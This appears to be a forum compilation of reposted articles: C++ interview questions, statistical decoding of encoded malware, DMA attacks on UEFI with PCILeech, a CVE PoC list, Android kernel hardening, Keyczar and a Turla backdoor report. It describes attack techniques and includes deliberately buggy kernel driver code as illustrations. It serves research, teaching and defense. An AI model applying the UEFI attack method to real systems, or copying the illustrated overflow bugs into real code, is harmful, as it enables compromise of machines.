This tests for the candidate's knowledge of std::enable_if, a compile-time construct which lets the C++ programmer put additional restrictions on the types that their template accepts. This is an advanced skill, useful when writing library code, for example to avoid incorrect or inefficient usage of an API. The interesting part here is the function signature, but the candidate's ability to implement an insertion sort is also tested. It's up to the interviewer how much emphasis to put on either of these parts.

Possible answers

A possible implementation (note the parentheses around N < 128, which are needed inside a template argument list):

template<typename T, std::size_t N>
typename std::enable_if<(N < 128) && std::is_integral<T>::value, void>::type
insertion_sort(std::array<T, N>& array) {
    for (std::size_t i = 0; i < N; i++) {
        for (std::size_t j = i; j > 0 && array[j] < array[j-1]; j--) {
            std::swap(array[j], array[j - 1]);
        }
    }
}

Do not punish the candidate for not knowing the exact usage of all these standard library templates. The important thing is that they grasp the overall concepts; the details can be looked up online easily enough.

Follow-up questions

If you haven't asked the "pointer detector" question, you could ask the candidate here how they would implement std::enable_if and/or std::is_integral.
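The follow-up about implementing std::enable_if only takes a couple of lines: the primary template has no ::type member, so substitution fails (SFINAE) whenever the condition is false. A minimal sketch (the names my_enable_if and sort_small are hypothetical, chosen to avoid clashing with the standard library):

```cpp
#include <algorithm>
#include <array>
#include <cassert>
#include <cstddef>
#include <type_traits>

// Primary template: no ::type member, so substitution fails.
template<bool B, typename T = void>
struct my_enable_if {};

// Only the "true" specialization provides ::type.
template<typename T>
struct my_enable_if<true, T> {
    typedef T type;
};

// Used exactly like std::enable_if in the insertion_sort signature above;
// here std::sort stands in for the sorting algorithm itself.
template<typename T, std::size_t N>
typename my_enable_if<(N < 128) && std::is_integral<T>::value, void>::type
sort_small(std::array<T, N>& a) {
    std::sort(a.begin(), a.end());
}
```

Calling sort_small with an std::array<double, 4> or an std::array<int, 200> would fail to compile, because the primary my_enable_if has no ::type, which is precisely the restriction the question asks for.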
↑↑ Scroll up to the list of C++ questions

[Question #10 – Max heap – Algorithms and data structures]

Describe what a max heap is. Provide the definition of a max heap class which supports a wide range of element types and all basic operations that can be performed on a heap.

Why this question?

At first, this seems like a pure algorithms question, but note that we are not asking for the implementation of any of the operations. This question purely tests the candidate's ability to design a proper C++ class.

Possible answers

Depending on the design decisions that the interview candidate makes along the way, the result could be something like this:

template<typename T>
class heap {
public:
    void add(T const& value);
    T const& max() const;
    T remove_max();
    size_t size() const;

private:
    std::vector<T> elements;
};

Look out for the following:

- Are the class and its operations named consistently and intuitively?
- What type is used for the internal container? std::vector is preferred, but other possibilities exist. Use of a raw pointer to an array is a red flag, because it will make the class needlessly hard to implement.
- What is the argument type of the add function? This should be a pointer or reference type in order to avoid needless copying. An overload that takes an rvalue reference is a bonus.
- What is the return value of the max and remove_max functions?
- Are functions marked as const where possible?
- Are noexcept clauses used as appropriate?

Follow-up questions

Many design decisions can be made along the way, each of which can be used by the interviewer as a hook to lead into further discussion about the various tradeoffs in the design.

↑↑ Scroll up to the list of C++ questions

[C++ Interview Test]

Prefer a more hands-off approach to selecting candidates? No problem: just use our automated multiple-choice C++ test instead. Just send prospective developers their own unique custom link, and you'll automatically receive an email notification if they pass.
You can make your candidate selection process even more efficient with a mix-and-match approach: use our 20-question quiz to find the top candidates, and then bring them in for an interview using our premade questions. You can save time and effort by weeding out the majority of candidates before you ever see them in person!

↑↑ Scroll up to the list of C++ questions

Conclusion

It remains a tricky business to assess an interview candidate's worth within the space of an hour, or even two. Using a set of well-tested C++ programming interview questions like the above, and calibrating them by using them on many different candidates, will help you take some of the noise out of the equation and get a better signal on the candidate's abilities. This, in turn, will result in better hiring decisions, a stronger team, and eventually a better-functioning organization.

↑↑ Scroll up to the list of C++ questions

Authors

These C++ technical interview questions have been created by this team of C++ professionals:

Thomas ten Cate, Ex-Googler
Agustín Bergé
Thomas Pigarelli
Robert Haberlach
Cameron Desrochers
Michele Caini

Sursa: https://tests4geeks.com/cpp-interview-questions/
20. Decoding malware via simple statistical analysis

Intro

Analyzing malware often requires code reverse engineering, which can scare people away from malware analysis. Executables are often encoded to avoid detection. For example, many malicious Word documents have an embedded executable payload that is base64 encoded (or uses some other encoding). To understand the encoding, and to be able to decode the payload for further analysis, reversing of the macro code is often performed. But code reversing is not the only possible solution. Here we will describe a statistical analysis method that can be applied to certain malware families, such as the Hancitor malicious documents. We will present this method step by step.

Examples

First we start with a Windows executable (PE file) that is BASE64 encoded. In BASE64 encoding, 64 different characters are used to encode bytes. 64 is 6 bits, hence there is an overhead when encoding in BASE64, as encoding one byte (8 bits) will require 2 BASE64 characters (6 bits + 2 bits). With byte-stats.py, we can generate statistics for the different byte values found in a file. When we use this to analyze our BASE64 encoded executable, we get this output:

In the screenshot above we see that we have 64 different byte values, and that 100% of the byte values are BASE64 characters. This is a strong indication that the data in file base64.txt is indeed BASE64 encoded. Using the option -r of byte-stats.py, we are presented with an overview of the ranges of byte values found in the file:

The identified ranges /0123456789, ABCDEFGHIJKLMNOPQRSTUVWXYZ and abcdefghijklmnopqrstuvwxyz (and the single character +) confirm that this is indeed BASE64 data. Padded BASE64 data would include one or two padding characters at the end (the padding character is =). Decoding this file with base64dump.py (a BASE64 decoding tool) confirms that it is a PE file (cf. the MZ header) that is BASE64 encoded.
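The two numbers byte-stats.py reports here, the count of distinct byte values and the fraction of bytes in the BASE64 alphabet, are simple to compute yourself. A C++ sketch of that check (an illustration of the idea, not the actual tool):

```cpp
#include <array>
#include <cassert>
#include <cstddef>
#include <string>

struct ByteStats {
    std::size_t unique = 0;   // number of distinct byte values seen
    double base64_ratio = 0;  // fraction of bytes in the BASE64 alphabet
};

// The BASE64 alphabet: A-Z, a-z, 0-9, '+' and '/'.
static bool is_base64_char(unsigned char c) {
    return (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
           (c >= '0' && c <= '9') || c == '+' || c == '/';
}

ByteStats analyze(std::string const& data) {
    std::array<std::size_t, 256> counts{};  // histogram of byte values
    std::size_t base64 = 0;
    for (unsigned char c : data) {
        counts[c]++;
        if (is_base64_char(c)) base64++;
    }
    ByteStats s;
    for (std::size_t n : counts)
        if (n) s.unique++;
    if (!data.empty())
        s.base64_ratio = double(base64) / double(data.size());
    return s;
}
```

On a genuinely BASE64-encoded payload of any size, unique approaches 64 and base64_ratio is 1.0 (ignoring trailing = padding), which is exactly the signal described above.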
Now, sometimes the encoding is a bit more complex than just BASE64 encoding. Let's take a look at another sample:

The range of lowercase letters, for example, starts with d (instead of a) and ends with } (instead of z). We observe a similar change for the other ranges. It looks like all BASE64 characters have been shifted 3 positions to the right. We can test this hypothesis by subtracting 3 from every byte value (that's shifting 3 positions to the left) and analyzing the result. To subtract 3 from every byte, we use the program translate.py. translate.py takes a file as input and an arithmetic operation: operation "byte – 3" will subtract 3 from every byte value. This is the result we get when we perform a statistical analysis of the byte values shifted 3 positions to the left:

In the screenshot above we see 64 unique bytes and all bytes are BASE64 characters. When we try to decode this with base64dump, we can indeed recover the executable:

Let's move on to another example. Malicious documents that deliver Hancitor malware use an encoding that is a bit more complex:

This time, we have 68 unique byte values, and the ranges are shifted by 3 positions when we look at the left of a range, but they appear to be shifted by 4 positions when we look at the right of a range. How can this be explained? One hypothesis is that the malware is encoded by shifting some of the bytes by 3 positions, and the other bytes by 4 positions. A simple method is to alternate this shift: the first byte is shifted by 3 positions, the second by 4 positions, the third again by 3 positions, the fourth by 4 positions, and so on… Let's try out this hypothesis, by using translate.py to shift by 3 or 4 positions depending on the position:

Variable position is an integer that gives the position of the byte (starting at 0), and position % 2 is the remainder of dividing position by 2. Expression position % 2 == 0 is True for even positions, and False for odd positions.
IFF is the IF function: if argument 1 is true, it returns argument 2, otherwise it returns argument 3. This is how we can alternate our shift between 3 and 4. But as you can see, the result is certainly not BASE64, so our hypothesis is wrong. Let's try shifting by 4 and 3 (instead of 3 and 4):

This time we get the ranges for BASE64. Testing with base64dump.py confirms our hypothesis:

Conclusion

Malware authors use encoding schemes that can be reverse engineered by statistical analysis and by testing simple hypotheses. Sometimes a bit of trial and error is needed, but these encoding schemes can be simple enough to decode without having to perform reverse engineering of code.

This entry was posted in malware on August 30, 2017 by didiernviso.

Sursa: https://blog.nviso.be/2017/08/30/decoding-malware-via-simple-statistical-analysis/
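The confirmed decoding, a shift of 4 for even positions and 3 for odd positions, can also be undone without translate.py. A short C++ sketch of that step (assuming the same zero-based position convention as the article; the function name is illustrative):

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Undo the Hancitor-style encoding: bytes at even positions were shifted
// right by 4 and bytes at odd positions by 3, so we subtract 4 and 3
// alternately to recover the underlying BASE64 text.
std::string shift_decode(std::string const& encoded) {
    std::string out = encoded;
    for (std::size_t i = 0; i < out.size(); i++) {
        int shift = (i % 2 == 0) ? 4 : 3;
        out[i] = static_cast<char>(static_cast<unsigned char>(out[i]) - shift);
    }
    return out;
}
```

The output can then be fed to any BASE64 decoder; if the hypothesis is right, the familiar TVqQ… (the encoded MZ header) should appear at the start.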
22. Attacking UEFI

Wednesday, August 30, 2017

Unlike Macs, many PCs are likely to be vulnerable to pre-boot Direct Memory Access (DMA) attacks against UEFI. If an attack is successful on a system configured with secure boot, then the chain of trust is broken and secure boot becomes insecure boot. If code execution is gained before the operating system is started, further compromise of the not-yet-loaded operating system may be possible. As an example, it may be possible to compromise a Windows 10 system running Virtualization Based Security (VBS) with Device Guard. This has already been researched by Dmytro Oleksiuk. This post will focus on attacking UEFI over DMA and not on potential further compromises of the system.

What is UEFI?

UEFI is short for Unified Extensible Firmware Interface. It is the firmware that runs on the computer before the operating system is booted. UEFI is responsible for detecting memory, disks and other hardware required to boot the operating system. UEFI is a small operating system in itself. It's also sometimes a bit sloppily called the BIOS.

The Targets

A brand new Intel NUC i3 "Kaby Lake" purchased in June. 8GB RAM, Win10 1703 with Secure Boot, Bitlocker+TPM, Virtualization Based Security (VBS) with Device Guard enabled. BIOS revision: BNKBL357.86A.0036.2017.0105.1112. DMA access via the internal M.2 slot.

An older Lenovo T430, 8GB RAM, Win10 1703 with Secure Boot, Bitlocker+TPM, Virtualization Based Security (VBS) with Device Guard enabled. DMA access via the ExpressCard slot.

T430 to the left, NUC to the right.

The Problem

The root problem is that many UEFIs still do not protect themselves against DMA attacks, despite the hardware (VT-d/IOMMU) to do so being included in all CPUs for many years. The screenshot below shows PCILeech first searching the memory of a target computer over DMA, trying to find where to hook into UEFI.
Once inside, it's easy to dump memory (also shown) and do other evilness, such as executing arbitrary code despite secure boot being enabled.

Loading a PCILeech module into UEFI, dumping the memory and unloading the module.

The Attack

Taking control is a simple matter of finding the correct memory structures and overwriting them, if DMA access is allowed. This process is automated with PCILeech. It's possible to automatically search for the memory address of the EFI system table "IBI SYST", or, even better, to specify it directly to PCILeech. The EFI System Table contains the location of the EFI boot services table "BOOTSERV", which contains many useful function pointers. The boot services functions are useful both for hooking and for calling into from our implanted module. In the example below, the boot services function SignalEvent() is hooked. Once the PCILeech "kernel" module for UEFI is inserted, it's possible to use it to dump memory and execute code, just as with any normal PCILeech kernel module. In the example below, the PCILeech UEFI implant uefi_textout is called multiple times. The output is printed on the screen of the victim computer.

The text HELLO FROM EVIL PCILEECH IMPLANT !!! is printed multiple times after the PCILeech module for UEFI has been inserted.

Once the attack was completed, the kmdexit command was issued to PCILeech and the UEFI implant was unloaded. In this case Windows will start booting, as shown below. If targeting the operating system being loaded, it's better to hook ExitBootServices(), which is called by the EFI-based operating system loader when the operating system takes over control of the computer from UEFI. At this point in time it will be possible for malicious code to modify the operating system loader.

Windows is booting normally once the PCILeech UEFI module is unloaded.

Can I try it myself?

Absolutely! The code is available as part of the open source PCILeech Direct Memory Access Attack Toolkit on GitHub.
Conclusions

UEFI DMA attacking with PCILeech is now public, inexpensive and easy to perform. DMA attacks against UEFI are no longer theoretical. Vendors should enable VT-d to protect against DMA attacks. Further compromise of the operating system may be possible. It may not be possible to rely on Virtualization Based Security when running on top of a vulnerable UEFI.

Posted by Ulf Frisk at 10:53 AM

Sursa: http://blog.frizk.net/2017/08/attacking-uefi.html
  22. Awesome CVE PoC ✍️ A curated list of CVE PoCs. Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you might also want to check out awesome-web-security. Please read the contribution guidelines before contributing. 🌈 This repo is full of PoCs for CVEs. Check out my repos 🐾 or say hi on my Twitter. Contents CVE-2013-6632 CVE-2014-1705 CVE-2014-3176 CVE-2014-6332 CVE-2014-7927 CVE-2014-7928 CVE-2015-0235 CVE-2015-0240 CVE-2015-1233 CVE-2015-1242 CVE-2015-1635 CVE-2015-3306 CVE-2015-5531 CVE-2015-6086 CVE-2015-6764 CVE-2015-6771 CVE-2015-7450 CVE-2015-7545 CVE-2015-8584 CVE-2016-0450 CVE-2016-0451 CVE-2016-0728 CVE-2016-1646 CVE-2016-1653 CVE-2016-1665 CVE-2016-1669 CVE-2016-1677 CVE-2016-1688 CVE-2016-1857 CVE-2016-2384 CVE-2016-3087 CVE-2016-3088 CVE-2016-3309 CVE-2016-3371 CVE-2016-3386 CVE-2016-4338 CVE-2016-4622 CVE-2016-4734 CVE-2016-4971 CVE-2016-5129 CVE-2016-5172 CVE-2016-5198 CVE-2016-5200 CVE-2016-5734 CVE-2016-6210 CVE-2016-6277 CVE-2016-6415 CVE-2016-7124 CVE-2016-7189 CVE-2016-7190 CVE-2016-7194 CVE-2016-7200 CVE-2016-7201 CVE-2016-7202 CVE-2016-7203 CVE-2016-7240 CVE-2016-7241 CVE-2016-7255 CVE-2016-7286 CVE-2016-7287 CVE-2016-7288 CVE-2016-7547 CVE-2016-7552 CVE-2016-8413 CVE-2016-8477 CVE-2016-8584 CVE-2016-8585 CVE-2016-8586 CVE-2016-8587 CVE-2016-8588 CVE-2016-8589 CVE-2016-8590 CVE-2016-8591 CVE-2016-8592 CVE-2016-8593 CVE-2016-9651 CVE-2016-9793 CVE-2016-10033 CVE-2016-10277 CVE-2016-10370 CVE-2017-0015 CVE-2017-0037 CVE-2017-0059 CVE-2017-0070 CVE-2017-0071 CVE-2017-0134 CVE-2017-0141 CVE-2017-0143 CVE-2017-0144 CVE-2017-0145 CVE-2017-0146 CVE-2017-0147 CVE-2017-0148 CVE-2017-0199 CVE-2017-0213 CVE-2017-0283 CVE-2017-0290 CVE-2017-0392 CVE-2017-0521 CVE-2017-0531 CVE-2017-0541 CVE-2017-0576 CVE-2017-1082 CVE-2017-1083 CVE-2017-1084 CVE-2017-1085 CVE-2017-2416 CVE-2017-2446 CVE-2017-2447 CVE-2017-2464 CVE-2017-2491 CVE-2017-2521 CVE-2017-2531 CVE-2017-2536 CVE-2017-2547 CVE-2017-2636 CVE-2017-3599 
CVE-2017-3629 CVE-2017-3630 CVE-2017-3631 CVE-2017-4901 CVE-2017-4914 CVE-2017-4918 CVE-2017-4971 CVE-2017-5030 CVE-2017-5040 CVE-2017-5053 CVE-2017-5071 CVE-2017-5135 CVE-2017-5622 CVE-2017-5624 CVE-2017-5626 CVE-2017-5638 CVE-2017-5689 CVE-2017-5891 CVE-2017-5892 CVE-2017-5948 CVE-2017-6074 CVE-2017-6178 CVE-2017-6326 CVE-2017-6980 CVE-2017-6984 CVE-2017-7219 CVE-2017-7269 CVE-2017-7279 CVE-2017-7280 CVE-2017-7281 CVE-2017-7281 CVE-2017-7281 CVE-2017-7293 CVE-2017-7308 CVE-2017-7442 CVE-2017-7494 CVE-2017-7529 CVE-2017-8295 CVE-2017-8386 CVE-2017-8464 CVE-2017-8514 CVE-2017-8543 CVE-2017-8850 CVE-2017-8851 CVE-2017-8877 CVE-2017-8878 CVE-2017-8917 CVE-2017-9417 CVE-2017-9791 CVE-2017-9993 CVE-2017-10661 CVE-2017-11105 CVE-2017-11421 CVE-2017-1000112 CVE-2017-1000117 CVE-2017-1000353 CVE-2017-1000364 CVE-2017-1000365 CVE-2017-1000366 CVE-2017-1000367 CVE-2017-1000369 CVE-2017-1000370 CVE-2017-1000371 CVE-2017-1000372 CVE-2017-1000373 CVE-2017-1000374 CVE-2017-1000375 CVE-2017-1000376 CVE-2017-1000377 CVE-2017-1000378 CVE-2017-1000379 More information: https://github.com/qazbnm456/awesome-cve-poc
23. Hardening the Kernel in Android Oreo

30 August 2017

Posted by Sami Tolvanen, Senior Software Engineer, Android Security

The hardening of Android's userspace has increasingly made the underlying Linux kernel a more attractive target to attackers. As a result, more than a third of Android security bugs were found in the kernel last year. In Android 8.0 (Oreo), significant effort has gone into hardening the kernel to reduce the number and impact of security bugs.

Android Nougat worked to protect the kernel by isolating it from userspace processes with the addition of SELinux ioctl filtering and requiring seccomp-bpf support, which allows apps to filter access to available system calls when processing untrusted input. Android 8.0 focuses on kernel self-protection with four security-hardening features backported from upstream Linux to all Android kernels supported in devices that first ship with this release.

Hardened usercopy

Usercopy functions are used by the kernel to transfer data from user space to kernel space memory and back again. Since 2014, missing or invalid bounds checking has caused about 45% of Android's kernel vulnerabilities. Hardened usercopy adds bounds checking to usercopy functions, which helps developers spot misuse and fix bugs in their code. Also, if obscure driver bugs slip through, hardening these functions prevents the exploitation of such bugs. This feature was introduced in the upstream kernel version 4.8, and we have backported it to Android kernels 3.18 and above.

int buggy_driver_function(void __user *src, size_t size)
{
    /* potential size_t overflow (don't do this) */
    u8 *buf = kmalloc(size * N, GFP_KERNEL);
    …
    /* results in buf smaller than size, and a heap overflow */
    if (copy_from_user(buf, src, size))
        return -EFAULT;
    /* never reached with CONFIG_HARDENED_USERCOPY=y */
}

An example of a security issue that hardened usercopy prevents.
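The size_t overflow flagged in the comment is easy to reproduce in ordinary user-space code. A C++ sketch (hypothetical helper names, not kernel code) of the wraparound and of the bounds check such a driver should perform:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Unsigned multiplication wraps around (well-defined, but disastrous for
// an allocation size): a large `size` times `n` can yield a tiny value,
// while the subsequent copy still uses the original `size`.
std::size_t alloc_size(std::size_t size, std::size_t n) {
    return size * n;  // may wrap silently
}

// The check the driver should have done before allocating.
bool would_overflow(std::size_t size, std::size_t n) {
    return n != 0 && size > SIZE_MAX / n;
}
```

For example, alloc_size(SIZE_MAX, 2) wraps to SIZE_MAX - 1 rather than doubling, and would_overflow correctly rejects that input; hardened usercopy exists precisely to catch the copy that follows such a mismatched allocation.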
Privileged Access Never (PAN) emulation

While hardened usercopy functions help find and mitigate security issues, they can only help if developers actually use them. Currently, all kernel code, including drivers, can access user space memory directly, which can lead to various security issues. To mitigate this, CPU vendors have introduced features such as Supervisor Mode Access Prevention (SMAP) in x86 and Privileged Access Never (PAN) in ARM v8.1. These features prevent the kernel from accessing user space directly and ensure developers go through usercopy functions. Unfortunately, these hardware features are not yet widely available in devices that most Android users have today.

Upstream Linux introduced software emulation for PAN in kernel version 4.3 for ARM and 4.10 for ARM64. We have backported both features to Android kernels starting from 3.18. Together with hardened usercopy, PAN emulation has helped find and fix bugs in four kernel drivers in Pixel devices.

int buggy_driver_copy_data(struct mydata *src, void __user *ptr)
{
    /* failure to keep track of user space pointers */
    struct mydata *dst = (struct mydata *)ptr;
    …
    /* read/write from/to an arbitrary user space memory location */
    dst->field = … ;  /* use copy_(from|to)_user instead! */
    …
    /* never reached with PAN (emulation) or SMAP */
}

An example of a security issue that PAN emulation mitigates.

Kernel Address Space Layout Randomization (KASLR)

Android has included support for Address Space Layout Randomization (ASLR) for years. Randomizing memory layout makes code reuse attacks probabilistic and therefore more difficult for an attacker to exploit, especially remotely. Android 8.0 brings this feature to the kernel. While Linux has supported KASLR on x86 since version 3.14, KASLR for ARM64 has only been available upstream since Linux 4.6. Android 8.0 makes KASLR available in Android kernels 4.4 and newer.
KASLR helps mitigate kernel vulnerabilities by randomizing the location where kernel code is loaded on each boot. On ARM64, for example, it adds 13–25 bits of entropy depending on the memory configuration of the device, which makes code reuse attacks more difficult.

Post-init read-only memory

The final hardening feature extends existing memory protections in the kernel by creating a memory region that's marked read-only after the kernel has been initialized. This makes it possible for developers to improve protection on data that needs to be writable during initialization, but shouldn't be modified after that. Having less writable memory reduces the internal attack surface of the kernel, making exploitation harder.

Post-init read-only memory was introduced in upstream kernel version 4.6 and we have backported it to Android kernels 3.18 and newer. While we have applied these protections to some data structures in the core kernel, this feature is extremely useful for developers working on kernel drivers.

Conclusion

Android Oreo includes mitigations for the most common source of security bugs in the kernel. This is especially relevant because 85% of kernel security bugs in Android have been in vendor drivers that tend to get much less scrutiny. These updates make it easier for driver developers to discover common bugs during development, stopping them before they can reach end user devices.

Sursa: https://android-developers.googleblog.com/2017/08/hardening-kernel-in-android-oreo.html
  24. Keyczar

Important note: KeyCzar has some known security issues which may influence your decision to use it. See Known Security Issues.

Introduction

Keyczar is an open source cryptographic toolkit designed to make it easier and safer for developers to use cryptography in their applications. Keyczar supports authentication and encryption with both symmetric and asymmetric keys. Some features of Keyczar include:

- A simple API
- Key rotation and versioning
- Safe default algorithms, modes, and key lengths
- Automated generation of initialization vectors and ciphertext signatures
- Java, Python, and C++ implementations
- International support in Java

Keyczar was originally developed by members of the Google Security Team and is released under an Apache 2.0 license.

Quick Links

- Known Security Issues
- Discussion Group
- Design Document (PDF)

Why Keyczar?

Cryptography is easy to get wrong. Developers can choose improper cipher modes, use obsolete algorithms, compose primitives in an unsafe manner, or fail to anticipate the need for key rotation. Keyczar abstracts some of these details by choosing safe defaults, automatically tagging outputs with key version information, and providing a simple programming interface.

Keyczar is designed to be open, extensible, and cross-platform compatible. It is not intended to replace existing cryptographic libraries like OpenSSL, PyCrypto, or the Java JCE, and in fact is built on these libraries.

Sursa: https://github.com/google/keyczar
  25. Introduction

Herein we release our analysis of a previously undocumented backdoor that has been targeted against embassies and consulates around the world. Our analysis leads us to attribute it, with high confidence, to the Turla group.

Turla is a notorious group that has been targeting governments, government officials, and diplomats for years. They are known to run watering hole and spearphishing campaigns to better pinpoint their targets. Although this backdoor has been actively deployed since at least 2016, it has not been documented anywhere. Based on strings found in the samples we analyzed, we have named this backdoor "Gazer".

Recently, the Turla APT group has seen extensive news coverage surrounding its campaigns, something we haven't seen for a long time. The Intercept reported that there exists a 2011 presentation by Canada's Communications Security Establishment (CSE) outlining the errors made by the Turla operators during their operations, even though the tools they use are quite advanced. The codename for the Turla APT group in this presentation is MAKERSMARK.

Gazer, like its siblings in the Turla family, uses advanced methods to spy and persist on its targets. This whitepaper highlights the campaigns in which Gazer was used and also contains a technical analysis of its functionalities.

Download: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf